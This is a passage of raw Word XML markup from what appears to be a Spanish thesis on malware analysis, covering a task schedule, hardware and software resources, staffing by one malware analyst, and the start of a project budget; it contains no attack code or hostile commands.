              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="685960F6" w14:textId="534C7BFA" w:rsidR="00886B1A" w:rsidRDefault="009205E8">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>40,5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47E9AB96" w14:textId="06FEE7B5" w:rsidR="00886B1A" w:rsidRDefault="00D4609D">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>10/5/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A687ABF" w14:textId="36282F09" w:rsidR="00886B1A" w:rsidRDefault="00D4609D">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>25/5/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B0364F" w14:paraId="2B713492" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6127151E" w14:textId="57F644BD" w:rsidR="00886B1A" w:rsidRDefault="00886B1A">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Tarea 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33620547" w14:textId="5C5B55E1" w:rsidR="00886B1A" w:rsidRDefault="00363D79">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5271456A" w14:textId="4E3879E2" w:rsidR="00886B1A" w:rsidRDefault="009205E8">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>40,5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E80DE6E" w14:textId="51C251E2" w:rsidR="00886B1A" w:rsidRDefault="00D4609D">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>25/5/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10E20385" w14:textId="00FBA345" w:rsidR="00886B1A" w:rsidRDefault="005208BD">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>8/6/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CA8FF28" w14:textId="77777777" w:rsidR="00BD5CFC" w:rsidRDefault="00BD5CFC" w:rsidP="0021050D">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C514420" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24AF3E7E"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37" w:name="_Toc107862689"/>
      <w:bookmarkStart w:id="38" w:name="_Toc170500158"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.2.3   Planificación de tareas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="40D1C42F" w14:textId="77777777" w:rsidR="00FA7687" w:rsidRDefault="00FA7687" w:rsidP="00FA7687">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61839361" w14:textId="77777777" w:rsidR="00FA7687" w:rsidRPr="00FA7687" w:rsidRDefault="00FA7687" w:rsidP="00FA7687">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71FD2A75" w14:textId="4D2AF5D0" w:rsidR="00E95A92" w:rsidRDefault="00C94C6A" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tras la identificación y estimación de las tareas, se ha generado un diagrama Gantt como perspectiva general de las tareas y su duración a lo largo del proyecto completo</w:t>
      </w:r>
      <w:r w:rsidR="00F449F7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1852BDAC" w14:textId="26C9EAFC" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39432A01" w14:textId="0DDA94CD" w:rsidR="00E95A92" w:rsidRDefault="000C1FC5" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1BAA51F1">
          <v:shape id="Picture 7" o:spid="_x0000_i1031" type="#_x0000_t75" alt="A screenshot of a computer&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="width:441pt;height:76pt;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0">
            <v:imagedata r:id="rId42" o:title="A screenshot of a computer&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3634E582" w14:textId="77777777" w:rsidR="004628C0" w:rsidRDefault="004628C0" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60AF3CE1" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc107862690"/>
      <w:bookmarkStart w:id="40" w:name="_Toc170500159"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.3   GESTIÓN DE RECURSOS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="2F7AA6E9" w14:textId="77777777" w:rsidR="0064116C" w:rsidRDefault="0064116C" w:rsidP="00E95A92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5799"/>
        </w:tabs>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DBF7FBF" w14:textId="044372F3" w:rsidR="00E95A92" w:rsidRDefault="00AA2544" w:rsidP="00E95A92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5799"/>
        </w:tabs>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En este apartado se presentarán en detalle los recursos que son necesarios para la realización del proyecto junto con </w:t>
      </w:r>
      <w:r w:rsidR="00AE6457">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sus características principales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76948D76" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc107862691"/>
      <w:bookmarkStart w:id="42" w:name="_Toc170500160"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.3.1   Especificación de recursos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="3C03E838" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF08C06" w14:textId="0C1579B9" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Recursos materiales</w:t>
      </w:r>
      <w:r w:rsidR="00650621">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: como materiales para el proyecto, se necesitará de un ordenador portátil para realizar los análisis y trabajar con los resultados. El dispositivo </w:t>
      </w:r>
      <w:r w:rsidR="00CE0958">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>utilizado</w:t>
      </w:r>
      <w:r w:rsidR="00650621">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un MacBook Pro </w:t>
      </w:r>
      <w:r w:rsidR="006117AF">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r w:rsidR="00650621">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2023 que cuenta con las siguientes características:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7C5A43" w14:textId="58091D87" w:rsidR="00650621" w:rsidRDefault="00650621" w:rsidP="00650621">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CPU Apple M2 Pro ARM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7E981" w14:textId="5E697774" w:rsidR="00983EAA" w:rsidRDefault="00983EAA" w:rsidP="00650621">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pantalla de 14 pulgadas resolución Retina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B31BEFB" w14:textId="366409D5" w:rsidR="00650621" w:rsidRDefault="00650621" w:rsidP="00650621">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>16GB de memoria RAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632BF604" w14:textId="3CBAD570" w:rsidR="00650621" w:rsidRDefault="00650621" w:rsidP="00650621">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>512GB de almacenamiento SSD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F40BEB" w14:textId="5719F864" w:rsidR="00650621" w:rsidRDefault="00833BD3" w:rsidP="00650621">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>GPU integrada M2 de 10 núcleos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6695996A" w14:textId="1DEB01F7" w:rsidR="007946EC" w:rsidRDefault="00350CB1" w:rsidP="007946EC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1068"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En lo relativo al software utilizado, ninguna herramienta ha supuesto un coste de licencia, al tratarse en todos los casos de programas gratuitos o, en el caso de ser programas de pago, se ha utilizado la licencia </w:t>
      </w:r>
      <w:r w:rsidR="00F33A1E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">básica, educativa o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de demo</w:t>
      </w:r>
      <w:r w:rsidR="00F33A1E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">stración que carecen de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>coste</w:t>
      </w:r>
      <w:r w:rsidR="00B83076">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F33A1E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> asociados</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002E325E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Por otro lado</w:t>
      </w:r>
      <w:r w:rsidR="007946EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, se incurrirá en gastos de luz y material de oficina para realizar las tareas necesarias.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3338C0A9" w14:textId="3F39E725" w:rsidR="00E95A92" w:rsidRPr="00B077A9" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Recursos humano</w:t>
      </w:r>
      <w:r w:rsidR="004A15F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">s: </w:t>
      </w:r>
      <w:r w:rsidR="004A15F3" w:rsidRPr="00B077A9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">se contará </w:t>
      </w:r>
      <w:r w:rsidR="006763BE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">únicamente </w:t>
      </w:r>
      <w:r w:rsidR="004A15F3" w:rsidRPr="00B077A9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">con un analista de malware </w:t>
      </w:r>
      <w:r w:rsidR="00B077A9" w:rsidRPr="00B077A9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>para llevar a cabo las operaciones necesarias.</w:t>
      </w:r>
      <w:r w:rsidR="00931CF6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esta persona estará encargada de realizar los análisis </w:t>
      </w:r>
      <w:r w:rsidR="00CD21E9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>aplicados a</w:t>
      </w:r>
      <w:r w:rsidR="00931CF6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la muestra</w:t>
      </w:r>
      <w:r w:rsidR="00CD21E9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> seleccionada</w:t>
      </w:r>
      <w:r w:rsidR="00931CF6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, recabar la información que considere relevante y posteriormente organizarla y plasmarla en </w:t>
      </w:r>
      <w:r w:rsidR="00492BA8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el</w:t>
      </w:r>
      <w:r w:rsidR="00931CF6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> informe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2343DE40" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB20255"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43" w:name="_Toc107862692"/>
      <w:bookmarkStart w:id="44" w:name="_Toc170500161"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.3.2   Presupuesto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="311062DA" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72251B68" w14:textId="3B436A52" w:rsidR="00DC1D90" w:rsidRDefault="00DC1D90" w:rsidP="0074314B">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A continuación, se </w:t>
      </w:r>
      <w:r w:rsidR="00845BA7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>desglosará el presupuesto del proyecto, incluyendo tanto los recursos materiales utilizados como los recursos humanos.</w:t>
      </w:r>
      <w:r w:rsidR="00B64BAF">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> En lo referente a gastos de espacios físicos, se han considerado los gastos de luz y material de oficina básico, sin incluir los referentes a un espacio físico concreto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD154B" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7716BEC0" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Coste de recursos materiales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367D2100" w14:textId="2A201467" w:rsidR="004232C2" w:rsidRPr="002422A9" w:rsidRDefault="004232C2" w:rsidP="004232C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Ordenador portátil: </w:t>
      </w:r>
      <w:r w:rsidRPr="000E593B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>su precio de compra fueron 1</w:t>
      </w:r>
      <w:r w:rsidR="00B63F59">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E593B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>850</w:t>
      </w:r>
      <w:r w:rsidR="00F40CC5" w:rsidRPr="000E593B">
        <w:t>€.</w:t>
      </w:r>
      <w:r w:rsidR="00F40CC5">
        <w:t xml:space="preserve"> Se ha de tener en</w:t>
      </w:r>
      <w:r w:rsidR="000E593B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F40CC5">
        <w:t xml:space="preserve">cuenta que pese a ser utilizado en el proyecto durante únicamente 3 meses, se prevé amortizar el dispositivo durante </w:t>
      </w:r>
      <w:r w:rsidR="000E593B">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F40CC5">
        <w:t xml:space="preserve"> años. Por lo tanto, su coste final en lo relativo al proyecto ascien</w:t>
      </w:r>
      <w:r w:rsidR="000E593B">
        <w:t>de a 115,62€.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58490B88" w14:textId="70664840" w:rsidR="002422A9" w:rsidRDefault="002422A9" w:rsidP="004232C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Gastos de luz: </w:t>
      </w:r>
      <w:r w:rsidRPr="006F5182">
